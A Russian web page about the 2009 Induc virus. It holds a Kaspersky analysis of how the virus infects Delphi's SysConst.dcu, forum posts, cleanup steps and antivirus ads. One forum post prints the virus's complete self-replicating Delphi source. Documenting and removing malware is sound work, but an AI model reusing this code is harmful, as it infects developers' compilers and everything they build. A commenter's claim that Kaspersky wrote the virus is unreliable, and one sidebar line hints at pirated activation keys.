Чем отличается вирус induc

Всю прошлую неделю средства массовой информации без устали тиражировали новости, которые одна за одной выпускали антивирусные компании по всему миру. Такого слаженного хора уведомлений со стороны индустрии об одной и той же проблеме в этом году ранее удостаивались только червь Kido да очередные уязвимости в продуктах компании Adobe.

На этот раз источником переполоха стал Индюк. Нет, не птица, а вредоносная программа, называющаяся по нашей классификации Virus.Win32.Induc.a

История, приключившаяся с ним и со всей антивирусной индустрией в целом, столь необычна, что сначала мы ограничились только публикацией небольшого блог-поста на английском, решив проанализировать ситуацию более детально.

Но обо всем по порядку.

Начнем с самого названия вируса — Induc, которое можно читать и как Индюк (впрочем, некоторые решили, что это Индус, но это не так). Название прямым образом происходит из функционала самого вируса:

1. Будучи запущенным на компьютере жертвы (достаточно запустить какое-нибудь зараженное приложение), вирус проверяет, установлена ли Delphi. Его интересуют версии 4.0, 5.0, 6.0 и 7.0.

2. Если он обнаруживает, что Delphi установлена и версия правильная, он копирует из папки Source в папку Lib нужный ему .pas-файл, в данном случае это был sysconst.pas и дописывает в него свой код. Переименовав в .bak старый dcu-файл, зловред компилирует зараженный pas-файл и получает новый sysconst.dcu, который содержит зловредный код. Зараженный pas-файл больше не нужен, и он его удаляет.

Как видно, вирус внедряет свой код в файл с расширением dcu — "in dcu". Переставив пару букв местами, мы и получили название, которое нас вполне устроило — Induc.

Это еще один пример того, каким образом вредоносные программы получают свои имена (нас часто спрашивают об этом). И это же доказательство того, что именно "Лаборатория Касперского" была первой антивирусной компанией, добавившей в свои базы детектирование и лечение данного вируса.

После того как вирусу удалось внедрить свой код в sysconst.dcu, любая Delphi-программа, которая будет скомпилирована на этом компьютере, будет заражена. Это единственный функционал вируса, и кроме саморазмножения, он больше ничего не делает.

Что же примечательно здесь? В первую очередь, это способ размножения — вирус не заражает непосредственно исполняемые файлы, используя заражение файлов компилятора языка программирования. Данный способ не нов. Некоторые эксперты смогли вспомнить похожий вирус, существовавший в 90-е годы, работавший под MS-DOS и поражавший файлы на языке Pascal. Однако существует еще несколько примеров, из недавнего прошлого. Одним из них является Lykov.a, который дописывал свой код в исходные тексты программ на Visual Basic. Появился он в 2003 году, а через пару лет мы встретили его последователя — Lykov.b. Этот вариант поражал исходные файлы программ на VB.NET

Однако прямого заражения служебных файлов-компилятора ранее никто не делал. Этот способ столь необычен, что не укладывается в существующие классификации. Это не вирус в обычном смысле этого термина, — он не заражает файлы напрямую. Он изменяет только один файл в системе, и то не в каждой встречной. Его нельзя назвать ни червем, ни троянской программой, хотя и их признаки в его поведении можно усмотреть. Это действительно что-то совершенно новое.

Вторым интересным моментом является впечатляющая распространенность вируса. Уже на следующий день после добавления детектирования Индюк оказался в числе 70 наиболее распространенных вредоносных программ, по данным нашей Kaspersky Security Network. Речь идет о тысячах и десятках тысяч файлов. Скоро мы подведем итоги августа, и думаю, что Induc окажется в TOP-20. Потенциально речь может идти о миллионах его экземпляров по всему миру, что ничуть не уступает масштабам эпидемии того же червя Kido

Третий момент — пораженные Индюком приложения. Вирус существовал на компьютерах разработчиков программных продуктов, среди которых оказались весьма популярные и используемые большим количеством людей. Так, например, были обнаружены некоторые версии медиа-плеера AIMP и популярного инстант-мессенджера QIP, содержащие в себе данный вирус. Вирус был обнаружен в приложениях по всему миру, в том числе и на крупнейших сайтах с софтом, на дисках с программами, выпускаемых различными журналами и т.п.

Наличие Индюка в легальных программах, многие из которых уже давно считались "чистыми" и присутствовали в базах whitelisting массы вендоров, создало еще одну серьезную проблему. Проблему именно для индустрии, использующей whitelisting, в основном через "in-the-cloud" технологии. По сути дела, все существующие базы "чистых файлов" оказались испорчены — в них обнаружились зараженные файлы. Это потребовало полной ревизии баз и их зачистки. Одновременно это показало слабое место таких баз: в том случае, если подобные инциденты будут происходить в будущем, доверие к whitelisting неминуемо начнет падать.

Лечение зараженных файлов — не очень тривиальная задача. То есть вылечить их конечно можно, но последствия этого могут быть не очень хорошими. Масса программ при запуске проверяет свою целостность, подсчитывая некую контрольную сумму, например тот же QIP. Но так как он был заражен еще на этапе компиляции, эталонная контрольная сумма подсчитывается с учетом зловредной составляющей, и поэтому после пролечивания QIP работать отказывается. Программы без такой самопроверки будут нормально работать после лечения.

Когда мы стали получать и анализировать зараженные файлы, то практически сразу обнаружили несколько троянских программ, занимающихся кражей аккаунтов банковских систем, зараженных этим вирусом. Это довольно забавный факт, который означает, что сами авторы этих троянцев оказались жертвами вируса и использовали зараженную Delphi. Все эти троянцы имеют бразильское происхождение, но созданы разными группами вирусописателей. Этот факт никоим образом не означает бразильского происхождения самого Индюка, — просто Бразилия является одной из немногих стран, в которой язык Delphi является самым популярным языком программирования (довольно широко он распространен и в России).

От истории с зараженными троянцами мы переходим к весьма важному вопросу: как долго вирус существовал незамеченным и почему?

Сразу необходимо сказать, что вирус был обнаружен 12 августа 2009 года русским программистом Александром Алексеевым, известным также под ником Gun Smoker. Этот человек оказался единственным, кто столкнулся с проявлением вируса и смог не только понять, что в действительности происходит, но и информировать об этом общественность и направить подозрительные файлы в антивирусную лабораторию. За что ему персональное большое спасибо.

Несколько дней назад он же опубликовал высокачественную статью-анализ произошедшего, в которой не только описана хронология событий и собраны все актуальные материалы по данной теме, но и представлены FAQ (ответы на вопросы) для пользователей и разработчиков. Я настоятельно рекомендую ознакомиться всем с этим материалом. Объем проделанной работы и ее уровень весьма впечатляют.

По данным Gun Smoker наиболее ранние случаи появления зараженных файлов относятся к январю 2009 года. По нашей информации (у нас есть) зараженные файлы от конца 2008 года (ноябрь-декабрь). К сожалению, Delphi при компиляции файла не сохраняет дату линковки, что не дает нам возможности точно определить дату создания этих файлов. Можно с большой долей уверенности говорить как минимум о годичном существовании Индюка в "дикой природе".

Это означает, что мы имеем дело с беспрецедентным случаем — вредоносная программа больше года оставалась "невидимой" для антивирусных компаний. А это даже круче, чем история с руткитом Rustock, о которой мы писали в прошлом году.

В защиту антивирусной индустрии от возможных упреков могу сказать, что этот временной провал вызван исключительно тем, что вирус Индюк не делает ничего, что могло бы быть обнаружено существующими антивирусными технологиями.

Он не крадет данные, не взаимодействует с сетью, не рассылает спам — он не делает ничего, что может быть обнаружено. Если бы он нес в себе хоть какой-то функционал, то несомненно, был бы найден давно. И это, кстати, является ответом на вопрос: а что если теперь такой способ распространения вирусов станет популярным? Индюк представляет собой исключительно proof-of-concept, реализацию идеи. Возможно, он был написан кем-то просто на спор, или даже случайно, по ошибке. Такие вещи единичны и уникальны. Второй фазой может стать использование идеи киберпреступниками, но им неинтересно просто "разможение" — им необходимо что-то "делать" на пораженных системах. А все, что они могут "делать", обнаруживается в массе своей существующими технологиями. И уж по крайней мере не останется незамеченным на столь долгий срок.

Впрочем, пока мы довольно скептически относимся к перспективам технологии разможения, использованной в Индюке. У современных кибепреступников остается много других, менее сложных способов проникновения в системы и атак на пользователей.

Индюк преподал нам всем хороший урок. Антивирусным компаниям — на тему совершенства whitelisting и способности обнаруживать угрозы на ранней стадии. Разработчикам софта — на тему понимания того, как работают их языки программирования. Пользователям — очередной пример того, что неприятности могут поджидать нас где угодно, буквально на ровном месте и даже при использовании давно проверенных приложений.

Лаборатория Касперского обнаружила вирус Virus.Win32.Induc.a, распространяющийся через интегрированную среду разработки программного обеспечения CodeGear Delphi. Защита от новейшей угрозы уже реализована во всех продуктах "Лаборатории Касперского".

Для своего размножения Virus.Win32.Induc.a использует механизм двушагового создания исполняемых файлов, реализованный в среде Delphi. Согласно данному механизму, исходный код разрабатываемых приложений сначала компилируется в промежуточные .dcu-модули, из которых затем собираются исполняемые в Windows файлы.

Новый вирус активизируется при запуске заражённого им приложения и проверяет, установлен ли на компьютере пакет среды разработки Delphi версий 4.0-7.0. В случае обнаружения пакета, Virus.Win32.Induc.a внедряется в исходный файл базовых констант Delphi Sysconst.pas и компилирует его, в результате чего получается модифицированный откомпилированный файл базовых констант Sysconst.dcu.

Практически каждый проект Delphi включает строчку "use SysConst", поэтому заражение одного системного модуля ведет к инфицированию всех разрабатываемых приложений. Это приводит к тому, что в результате модификации Sysconst.dcu, в дальнейшем все программы, создаваемые в заражённой среде, содержат код нового вируса. Изменённый pas-файл вирусу больше не нужен и удаляется.

В настоящее время вирус не несет функциональной нагрузки помимо самого заражения, скорее он предназначен для демонстрации и тестирования нового вектора заражений. Отсутствие заметной и деструктивной функциональности, инфицирование новым вирусом некоторых версий популярного интернет-пейджера QIP, а также обычная практика публикации .dcu-модулей разработчиками уже привели к широкому распространению Virus.Win32.Induc.a во всем мире. Вполне вероятно, что в будущем он может быть доработан киберпреступниками в сторону увеличения деструктивности.

Продукты "Лаборатории Касперского" успешно детектируют Virus.Win32.Induc.a и излечивают от него как откомпилированные в Delphi модули, так и файлы исполняемых в Windows форматов.

1. Компания Лаборатория Касперского
2. Новость Троян для Mac OS X представляется обновлением QuickTime
3. Новость Рейтинг вредоносных программ за июль
4. Новость Как проверить, украден ли аккаунт ВКонтакте и Одноклассники?
5. Новость Тесты Symbian пропустили троянскую ботнет-программу
6. Новость Trojan-Ransom.Win32.SMSer вымогает деньги от имени Касперского

Тоже Каспер обнаружил вышеописанную зверушку в autorun.exe одного из левых дисков. Диск приобретен, кстати, не где попало, а в супермаркете быттехники "Эльдорадо". Вынужден был запускать установку игры с этого диска минуя авторан.

Эта скотина заразила мне E:/autorun.exe - СТАЛКЕР. Вылечить Касперским не получается, ссылаясь на то, что нет прав. Помогите плииииз

Мою D7 тоже подбили, я сначала думал, что она программы делает похожими на вирус, поэтому и не обратил никакого внимания, как думаете c QIP прибыл? или QIP самого заразили?

Заметь-те такой факт, что только Антивирус Касперского умеет грамотно удалять этот вирус из зараженных файлов! А остальные АВ просто бросают зараженные файлы в карантин без возможности востановления. Напрашивается очевидный факт, что именно лаборатория Касперского изобрела данный вирус, устроила его распространение с целью предложения лекарства от онного, что по их мнению (и так оно и есть) должно и уже способствует распространению именно их АВ продукта.

P.S.> КОзлы вонючие, знают что, их АВ не конкурентен по скорости и сильно тормозит машины - вот и толкнули способ наживится.

У меня тоже это сцуко поселился

мне этот вирус уже достаточно мозгов насушил ..

У меня тоже каспер нашел на диске С System Volume Information
Virus.Win32.Induc.a

Внимание всем, использующим Delphi c 4 по 7!

В интернете появился специфичный для Delphi вирус. Суть его в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некторые версии популярного мессенджера QIP оказались заражены им (команда разработчиков QIP приносит за это свои извинения). Пока единственный обнаруженный вредный эффект от вируса — это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland \Delphi\x.0 (x — от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значение ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.

Проверьте свои версии Delphi и, если найдёте у себя SysConst.bak, выполните следующие действия:
1. Удалите SysConst.dcu
2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске — это убережёт систему от повторного заражения.

Код выглядит примерно вот так:

uses windows; var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]', '=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin', 'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if hDWORD(-1) then begin CloseHandle', '(h);exit;end;<$I->assignfile(f1,s);reset(f1);if ioresult0 then exit;assignfile', '(f2,d+$pas$);rewrite(f2);if ioresult0 then begin closefile(f1);exit;end; while', 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)0', 'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2', ',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,', 'x(sc[h]));closefile(f1);closefile(f2);<$I+>MoveFile(pchar(d+$dcu$),pchar(d+$bak$', ')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.', 'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,', 'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),', 'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,', '0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=', 'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,', '@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of', 'char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(', 'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then', 'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=', '1; while c[i]#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+', '$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;', 'begin st; end.'); function x(s:string):string; var i:integer; begin for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39; result:=s; end; procedure re(s,d,e:string); var f1,f2:textfile; h:cardinal; f:STARTUPINFO; p:PROCESS_INFORMATION; b:boolean; t1,t2,t3:FILETIME; begin h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if hDWORD(-1) then begin CloseHandle(h); exit; end; <'I->assignfile(f1,s); reset(f1); if ioresult0 then exit; assignfile(f2,d+'pas'); rewrite(f2); if ioresult0 then begin closefile(f1); exit; end; while not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos('implementation',s)0 then break; end; for h:= 1 to 1 do writeln(f2,sc[h]); for h:= 1 to 23 do writeln(f2,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');'); for h:= 2 to 24 do writeln(f2,x(sc[h])); closefile(f1); closefile(f2); <'I+>MoveFile(pchar(d+'dcu'),pchar(d+'bak')); fillchar(f,sizeof(f),0); f.cb := sizeof(f); f.dwFlags := STARTF_USESHOWWINDOW; f.wShowWindow := SW_HIDE; b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p); if b then WaitForSingleObject(p.hProcess,INFINITE); MoveFile(pchar(d+'bak'),pchar(d+'dcu')); DeleteFile(pchar(d+'pas')); h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0); if h=DWORD(-1) then exit; SetFileTime(h,@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of char; i:cardinal; r:string; v:char; begin for v:='4' to '7' do if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then begin i:=255; if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin r:=''; i:=1; while c[i]#0 do begin r:=r+c[i]; inc(i); end; re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" '); end; RegCloseKey(k); end; end; begin st; end.

Похоже на "вирус", который размножается путём вписывания себя в установленные Delphi, так что все программы, выходящие из-под "заражённых" Delphi будут включать в себя этот "вирус". Правда ничего больше кроме размножения он не делает. Ну, кроме того, что из-за ошибки в коде вируса вы получаете RunTime error 3, если на вашей машине есть ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x - от 4 до 7) с неправильным значением параметра RootDir (для правильного значение ошибки не происходит).

Определить факт "заражения" можно по наличию файла SysConst.bak в папке \Lib. Как удалить - просто удалить SysConst.dcu и переименовать SysConst.bak -> SysConst.dcu. Противодействовать - так-же: просто создайте SysConst.bak (из SysConst.dcu), так что "вирус" будет думать, что всю работу уже сделал. С уже скомпилированными программами так просто ничего не сделать - проще всего их будет пересобрать.

Сама проблема с RunTime Error 3 сидит тут:

Приветствую
Извините, если тема баян

Djinn
Отошлите файл в вирлаб, со своими комментариями

Забанен за флуд

Djinn
Отошлите файл в вирлаб, со своими комментариями

Спасибо за напоминание Сделано

17 Авг 2009 12:52:31
Уважаемый,

Ваш запрос был проанализирован.
Соответствующая запись добавлена в вирусную базу Dr.Web и будет доступна при следующем обновлении.

Спасибо за сотрудничество.

--
С уважением,
Служба вирусного мониторинга ООО "Доктор Веб"

Мдя . Похоже придется вернуться к прежней схеме - каспер в качестве антивируса и cureit как подстраховка
Заодно вместе с доктором вынести и квип

Keep yourself alive

Мдя . Похоже придется вернуться к прежней схеме - каспер в качестве антивируса и cureit как подстраховка
Заодно вместе с доктором вынести и квип

так, все намного плачевнее

этот вредоносное программное обеспечение изменяет файлы delphi и все проги скомпиленные таким delphi оказываются инфицироваными

может добавим детект сигнатуры вредоносное программное обеспечениеного куска?

у меня оказались инфицированы D5 и D6, и куча прог уже были отправлены по регионам.
на сегодня DrWeb детектит только qip.exe, а проги с вредоносное программное обеспечениеным кодом нет

как узнать какие файлы инфицированы а какие нет.

Забанен за флуд

так, все намного плачевнее
этот вредоносное программное обеспечение изменяет файлы delphi и все проги скомпиленные таким delphi оказываются инфицироваными
может добавим детект сигнатуры вредоносное программное обеспечениеного куска?

этот вредоносное программное обеспечение изменяет файлы delphi и все проги скомпиленные таким delphi оказываются инфицироваными

может добавим детект сигнатуры вредоносное программное обеспечениеного куска?

у меня оказались инфицированы D5 и D6, и куча прог уже были отправлены по регионам.
на сегодня DrWeb детектит только qip.exe, а проги с вредоносное программное обеспечениеным кодом нет

как узнать какие файлы инфицированы а какие нет.

Вы как грамотный специалист должны сделать в своих программах проверку целостности приложения. В новых средах разработки это делается одним кликом(идет проверка crc32). Да и написать процедуру лдля проверки целостности своего кода я думаю не составит труда.

вот тут есть вся информация с исходиниками и т.д.

отправил файлы через форму (запрос на лечение), что-то нет ответа с номером тикета

В интернете появился специфичный для Delphi вирус. Суть его в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некоторые версии популярного мессенджера QIP оказались заражены им (команда разработчиков QIP приносит за это свои извинения). Пока единственный обнаруженный вредный эффект от вируса — это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x — от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значения ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.

Проверьте свои версии Delphi и, если найдёте у себя SysConst.bak, выполните следующие действия:
1. Удалите SysConst.dcu
2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске — это убережёт систему от повторного заражения.

Зараженным оказался QIP, AIMP и возможно другие программы. Разработчики QIP уже пересобрали сборку 8095 без вируса.

ESET NOD32 Antivirus

Благодаря применению новейшей версии ядра сканирования ThreatSense® программа демонстрирует скорость и точность сканирования, свойственную антивирусам ESET NOD32. Применение передовых технологий позволяет превентивно блокировать работу вирусов, шпионского ПО, троянских и рекламных программ, а также червей и руткитов без снижения производительности системы, не вызывая раздражения у пользователя во время работы или игры на компьютере.
Многолетний опыт специалистов отражен в абсолютно новой архитектуре антивируса ESET NOD32, который обнаруживает максимальное количество злонамеренных программ при минимальных системных требованиях.
Система защиты от вирусов высокотехнологично очищает и удаляет большую часть обнаруженных заражений без участия пользователя.
Сканирование компьютера может осуществляться в фоновом режиме, незаметном для системы и пользователя.
Возможно сканирование входящей почты не только в Microsoft Outlook, но и в Outlook Express, Windows Mail, Windows Live Mail и Mozilla Thunderbird.
Прямой доступ к файловой системе обеспечивает высокую скорость и производительность.
Блокировка доступа к зараженным файлам.
Оптимизация под требования центра безопасности Windows, включая версию для Vista.

ESET Smart Security

Программа ESET Smart Security является первым представителем нового, полностью интегрированного подхода к компьютерной безопасности. Благодаря применению новейшей версии ядра сканирования ThreatSense® программа демонстрирует скорость и точность сканирования, свойственную антивирусам ESET NOD32, в сочетании с высоким уровнем технологий персонального брандмауэра и модуля защиты от нежелательной почты. Таким образом, продукт представляет собой развитую систему предупреждения атак и защиты компьютера от вредоносного кода. Система ESET Smart Security не похожа на неуклюжий клубок разнородных продуктов в одном пакете, что обычно предлагается другими поставщиками ПО. Система является результатом долгих усилий по разработке максимальной защиты с минимальным влиянием на производительность системы. Современные технологии с применением методов искусственного интеллекта способны превентивно противодействовать распространению компьютерныхвирусов, шпионского ПО, троянских программ, червей, рекламного-ПО, руткитов и других атак из Интернета без дополнительной нагрузки на систему и перерывов в работе компьютера.

Часто задаваемые вопросы по eset NOD32 и ESS

Антивирус Касперского® защищает компьютер от вредоносных программ, используя традиционные методы защиты от вирусов и новые проактивные технологии. Продукт полностью совместим с другим программным обеспечением для защиты персональных компьютеров (например, сетевыми экранами).
Основные функции

• Три степени защиты от известных и новых интернет-угроз: 1) проверка по базам сигнатур, 2) эвристический анализатор, 3) поведенческий блокиратор.
  
• Защита от вирусов, троянских программ и червей.
  
• Защита от шпионского (spyware) и рекламного (adware) ПО.
  
• Проверка файлов, почты и интернет-трафика в режиме реального времени.
  
• Защита от вирусов при работе с ICQ и другими IM-клиентами.
  
• Защита от всех типов клавиатурных шпионов.
  
• Обнаружение всех видов руткитов.
  
• Автоматическое обновление баз.
  

Дополнительные возможности

• Отмена нежелательных изменений на вашем компьютере.
  
• Самозащита антивируса от выключения или остановки.
  
• Средства создания диска аварийного восстановления системы.
  

Скачать:

Kaspersky Internet Security

Kaspersky Internet Security – это универсальное средство защиты информации. Программа обеспечивает не только антивирусную защиту, но и защиту от спама и сетевых атак. Также компоненты программы позволяют защищать компьютер от неизвестных угроз и интернет-мошенничества, контролировать доступ пользователей компьютера к интернету.

Преимущества

• Интегрированная защита от всех интернет-угроз.
  
• Комплексная антивирусная защита: 1) проверка по базам сигнатур, 2) эвристический анализатор, 3) поведенческий блокиратор.
  
• Проверка файлов, почты и интернет-трафика в режиме реального времени
  
• Персональный сетевой экран с системой IDS/IPS.
  
• Предотвращение утечек конфиденциальной информации.
  
• Родительский контроль.
  
• Защита от спама и фишинга.
  
• Автоматическое обновление баз.
  

Основные функции

• Защита от вирусов, троянских программ и червей.
  
• Защита от шпионского (spyware) и рекламного (adware) ПО.
  
• Защита от всех типов клавиатурных шпионов.
  
• Обнаружение всех видов руткитов.
  
• Защита от вирусов при работе с ICQ и другими IM-клиентами.
  
• Отмена нежелательных изменений на вашем компьютере.
  
• Средства создания диска аварийного восстановления системы.
  

Скачать:

Kaspersky CRYSTAL

• Защита компьютера от современных интернет-угроз.
  Kaspersky CRYSTAL сохраняет ваш цифровой мир кристально чистым, блокируя вредоносные программы, нежелательный контент и спам. Специальные инструменты предотвращают кражу ваших персональных данных при пользовании услугами интернет-банкинга и совершении покупок в сети.
  
• Самый полный набор антивирусных функций.
  Kaspersky CRYSTAL — это универсальное решение для комплексной защиты домашних компьютеров. Вам не нужно быть IT-специалистом, чтобы с его помощью управлять безопасностью домашней сети и защитить ее от вредоносных программ.
  
• Резервное копирование и шифрование важной информации.
  С помощью удобных инструментов резервного копирования, входящих в состав Kaspersky CRYSTAL, вы можете предотвратить потерю документов, фотографий, любимых аудиозаписей и фильмов в случае поломки или кражи компьютера. Передовые технологии шифрования данных позволяют избежать раскрытия вашей конфиденциальной информации злоумышленниками.
  
• Многоуровневая защита персональных данных.
  Виртуальная клавиатура и технологии защиты от фишинга предотвращают кражу логинов и паролей к онлайн-сервисам. Встроенная программа управления паролями генерирует надежные, устойчивые ко взлому пароли и автоматически заполняет формы регистрации и авторизации на веб-сайтах и в приложениях.
  
• Безопасная работа в интернете для всей семьи.
  Используя Kaspersky CRYSTAL, вы можете определять время, продолжительность и характер работы каждого пользователя вашей домашней сети. Также вы можете блокировать доступ к веб-сайтам с неприемлемым содержанием и осуществлять фильтрацию данных, передаваемых с помощью программ мгновенного обмена сообщениями.
  
• Централизованное управление защитой нескольких компьютеров.
  Kaspersky CRYSTAL позволяет управлять системой защиты вашей домашней сети с любого из компьютеров, на которых он установлен. Вы можете выполнять проверку объектов, осуществлять резервное копирование данных, а также отслеживать и ограничивать использование компьютеров и интернета другими пользователями.
  

• Центр управления Kaspersky CRYSTAL позволяет решать задачи по защите нескольких компьютеров в вашей домашней сети — проводить антивирусную проверку, выполнять резервное копирование, регулировать доступ к интернету и программам с помощью Родительского контроля и многое другое.
  
• С помощью Менеджера паролей вы можете генерировать и безопасно хранить уникальные надежные пароли к онлайн-сервисам и приложениям, требующим авторизации. При этом вам не нужно запоминать или записывать логин и пароль — Kaspersky CRYSTAL подставляет данные в нужные поля автоматически.
  
• Возможности Родительского контроля позволяют не только ограничить доступ детей к сайтам сомнительного содержания, но и регулировать время использования интернета и компьютера ребенком, а также предотвратить передачу им личных данных через программы обмена мгновенными сообщениями (MSN, ICQ).
  
• Kaspersky CRYSTAL содержит специальный инструмент для гарантированного удаления файлов с вашего компьютера. В отличие от стандартных методов удаления, позволяющих злоумышленникам восстановить стертые файлы и получить доступ к конфиденциальной информации, при использовании функции Необратимое удаление данных вы можете быть уверены в том, что ваша информация не попадет в чужие руки.
  
• Функции резервного копирования и восстановления данных обеспечат сохранность ваших данных даже в случае поломки или кражи компьютера. Kaspersky CRYSTAL автоматически создает резервные копии указанных вами данных в соответствии с установленным расписанием – локально или на указанном вами носителе (внешнем жестком диске, FTP-сервере и т.д.).
  
• Дополнительный уровень защиты информации обеспечивают инструменты шифрования данных, позволяющие создавать защищенные паролем файлы-контейнеры. Без знания пароля получить доступ к содержимому зашифрованного файла невозможно.
  
• В том случае, если вы не уверены в безопасности программы или веб-сайта, вы можете запустить их в особом режиме, используя инструмент Безопасная среда. В этом случае запуск происходит в изолированном виртуальном пространстве, что позволяет обезопасить ваш компьютер от возможного вредоносного воздействия.
  

ОС: XP SP2 и выше/Vista/7
Скачать:

Ответы на частые вопросы по KIS/KAV 2010 (версия 9.0), Решение самых актуальных проблем

Утилита обновления
Утилита обновления предназначена для скачивания и сохранения в отдельный каталог обновлений баз и модулей приложений Лаборатории Касперского.
C ее помощью вы можете скачать обновления для выбранных приложений Лаборатории Касперского, установленных в вашей сети или на домашнем компьютере. Утилита имеет возможность сохранять скачанные базы и автопатчи в локальную папку, в сетевой каталог, который подключен как диск к файловой системе данного компьютера, или на flash-носитель.
Все настройки утилиты задаются в конфигурационном файле. Для настройки и запуска утилиты обновления, которая работает на операционной системе Windows, вы можете использовать графический интерфейс.
Утилита обновления и статьи предоставляются в тестовом режиме!
Внимание! Обновление с помощью отдельной утилиты обновления рекомендуется только в случае, если компьютеры, на которых установлены приложения Лаборатории Касперского, не имеют выхода в интернет. Данный способ получения баз не может обеспечить моментальной доставки выпущенных обновлений и, как следствие, поддержания приложений в актуальном состоянии.

Разные полезности для продуктов Касперский:

Чёрный и белый список для Анти-Баннера Kaspersky Internet Security

Скины, которые дают без проблем активировать ваш любимый антивирус ключом!

Для тех, у кого автоматический поиск руткитов вызывает раздражение или тормозит компьютер, есть возможность от него избавиться.
Хотя это и нежелательно. Всё делаем на своё усмотрение.

ЧаВо по уничтожению вирусов + полезные ссылки, советы

Как выполнить скрипт в AVZ и "пофиксить" в HijackThis?

Сервис деактивации вымогателей-блокеров

Валериус Мрачный,
зачем вообще тема?

Если по теме - все-таки нам, обычным пользователям, и так достаточно головной боли со стабильностью системы, а тут еще на каждом шагу этой боли пытаются добавить, предлагая зачем-то морочиться с воровством антивирусов или покупкой дорогих лицензий. Зачем? Ведь для простого пользователя в данном случае существуют нормально работающие бесплатные альтернативы! Например, AVAST!

Поставил, зарегил и забыл. Прекрасно работает на любой ОС от ХР до Windows 7, обеспечивает более чем достаточный уровень защиты, не требует какой-либо дополнительной ручной настройки. Лично у меня ни разу ничего не пропустил.

P.S. во я рекламщик :rofl: Вообще самый лучший антивирус - МОЗГ. Иначе ничего не поможет.

avast! 5.0 Home Edition (русская версия)

Avast Antivirus Professional - антивирусная программа. Возможности: резидентный и обычный сканеры, проверка всей входящей и исходящей почты, интеграция в систему, блокирование потенциально опасных скриптов на веб-страницах, работа из командной строки, планировщик, возможность автообновления через Интернет. Интерфейс - на выбор двух типов: очень простой и интуитивно понятный и расширенный возможно использование скинов. Есть и такая опция, как специализированный антивирусный скринсейвер.
avast! 4 Professional Edition вобрал в себя все высокопроизводительные технологии для обеспечения одной цели: предоставить вам наивысший уровень защиты от компьютерных вирусов. Данный продукт представляет собой идеальное решение для рабочих станций на базе Windows.

Dr.Web Security Space


Dr.Web Security Space - лучшее решение вопроса комплексной защиты ПК от интернет-угроз: вирусов, руткитов, почтовых червей, хакерских утилит, компьютерных мошенников, спама, фишинговых сообщений, зараженных интернет-страниц и кибер-преступности, направленной против детей. Важным показателем качества работы антивирусной программы является не только ее способность находить вирусы, но и лечить их; не просто удалять инфицированные файлы вместе с важной для пользователя информацией, но и возвращать их в первоначальное "здоровое" состояние.
